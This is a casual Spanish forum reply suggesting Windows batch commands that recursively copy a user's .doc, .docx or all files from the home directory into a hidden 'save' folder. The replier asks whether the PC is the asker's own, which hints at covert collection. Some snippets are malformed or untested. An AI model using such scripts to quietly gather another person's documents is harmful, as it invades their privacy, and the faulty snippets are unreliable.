por ahi las soluciones mas simples son mejores que un codigo bonito...por lo que veo tratas de copiar archivos word y excel a una carpeta save...pues porque no usas copy y despues usando copiar pegar le vas cambiando las extensiones de archivos por cada extensión...
move "E:\Ares\My Shared Folder\___ARESTRA___*" "E:\Flony\flony14\videos"
jaja este rea un code para mover o sea cortar pegar de una carpeta a otra pero el concepto seria mas o menos
IF EXIST *.doc (copy /y %HOMEPATH% *.doc %save%)
IF EXIST *.docx (copy /y%HOMEPATH% *.docx %save%)
rem etc etc
va a tardar un cacho eso casi seguro depende de cuantos archivos tenga...pero bue
es mas lento hacerlo a mano
y seguro ocuparia mas espacio en tu pc..
...es tu pc?
xq es oculta
de ultima este me parece mejor
IF EXIST %HOMEPATH% (FOR /R %HOMEPATH% %%x in (*.*) DO copy %%x %save%)
jijiji el ultimo no lo probe pero me parece mejor....copiaria todo...
o
IF EXIST %HOMEPATH% (FOR /R %HOMEPATH% %%x in (*.doc) DO copy %%x %save%)
y le vas agregando las extensiones